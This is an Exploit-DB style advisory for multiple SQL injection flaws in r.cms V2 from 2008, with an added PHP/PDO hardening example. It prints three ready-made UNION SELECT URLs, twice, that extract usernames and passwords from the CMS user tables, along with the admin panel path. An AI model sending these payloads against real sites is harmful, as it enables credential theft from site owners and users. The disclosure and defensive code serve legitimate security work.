Vendor: r.cms
By: Lidloses_Auge
CVSS: 7.5 (HIGH)
CWE: 89 (SQL Injection)
Product Name: r.cms
Affected Version From: r.cms V2
Affected Version To: r.cms V2
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

r.cms V2 – Multiple SQL Injection Vulnerabilities

Almost every GET parameter is vulnerable to SQL injection. User data is stored in one of two possible tables, depending on the CMS version. The columns for username and password are username and userpassword. The exploit can be triggered by sending a malicious request to the target URL with the following payloads:

http://xxx/index.php?id=1+union+select+1,2,3,4,5,concat(username,0x3a,userpassword),7,8,9+from+rcmsv2_user/*
http://xxx/referenzdetail.php?id=-6+union+select+1,2,3,4,5,6,concat(username,0x3a,userpassword),8,9,10,11+from+rcms_user/*
http://xxx/produkte.php?id=-2+union+select+1,2,3,4,5,6,7,8,concat(username,0x3a,userpassword),10,11+from+rcmsv2_user/*

Mitigation:

Ensure that user input is properly sanitized and validated before being used in SQL queries.
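
One way to apply this to a numeric `id` parameter like the ones listed above, as an added example that is not r.cms code and not part of the advisory. It is PHP with PDO; the `pages` table, its columns and all function names are assumptions, and an in-memory SQLite database (requires the `pdo_sqlite` extension) stands in for the CMS database.

```php
<?php
declare(strict_types=1);

// Stand-in for the CMS database: in-memory SQLite with constructed rows.
function demo_db(): PDO
{
    $pdo = new PDO('sqlite::memory:');
    $pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $pdo->exec('CREATE TABLE pages (id INTEGER PRIMARY KEY, title TEXT)');
    $pdo->exec("INSERT INTO pages (id, title) VALUES (1, 'Home'), (2, 'Products')");
    return $pdo;
}

// Accept only an integer >= 1; arrays (?id[]=1) and any other text are rejected.
function parse_id($raw): ?int
{
    if (!is_string($raw)) {
        return null;
    }
    $id = filter_var($raw, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    return $id === false ? null : $id;
}

// Hardened lookup: the id is bound as an integer parameter, never concatenated.
function fetch_page(PDO $pdo, $raw): ?array
{
    $id = parse_id($raw);
    if ($id === null) {
        return null; // caller should answer with 400 or 404
    }
    $stmt = $pdo->prepare('SELECT id, title FROM pages WHERE id = :id');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

$pdo = demo_db();
// Values as they would arrive in $_GET['id'] ('+' already decoded to a space).
$samples = [
    '1', // legitimate request
    '1 union select 1,2,3,4,5,concat(username,0x3a,userpassword),7,8,9 from rcmsv2_user/*', // id value from the first URL above
    '2abc', // constructed: digits followed by other text
];
foreach ($samples as $raw) {
    $row = fetch_page($pdo, $raw);
    printf("%-24.24s => %s\n", $raw, $row === null ? 'rejected' : $row['title']);
}
```

Validation and parameter binding are applied together here: the validation rejects malformed input early, and the bound parameter keeps the query structure fixed even if a validation rule is later loosened.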

Exploit-DB raw data:

###############################################################
#
#           r.cms V2 - Multiple SQL Injection Vulnerabilities 
#                                                             
#      Vulnerability discovered by: Lidloses_Auge             
#      Greetz to:                   -=Player=- , Suicide, g4ms3, enco,
#                                   Palme, GPM, Free-Hack
#      Date:                        16.12.2008
#
###############################################################
#                                                             
#      Admin Panel: [Target]/rcms/
#      Description: Almost every GET parameter is vulnerable
#                   to SQL Injection, so I won't list 'em all.
#                   There are two possible tables which contain
#                   user data, depending on the CMS version.
#                   Table:
#                       rcmsv2
#                   or:
#                       rcms
#
#                   The Columns for username and password are:
#                       username
#                       userpassword
#                                                             
###############################################################

http://xxx/index.php?id=1+union+select+1,2,3,4,5,concat(username,0x3a,userpassword),7,8,9+from+rcmsv2_user/*
http://xxx/referenzdetail.php?id=-6+union+select+1,2,3,4,5,6,concat(username,0x3a,userpassword),8,9,10,11+from+rcms_user/*
http://xxx/produkte.php?id=-2+union+select+1,2,3,4,5,6,7,8,concat(username,0x3a,userpassword),10,11+from+rcmsv2_user/*

# milw0rm.com [2008-12-17]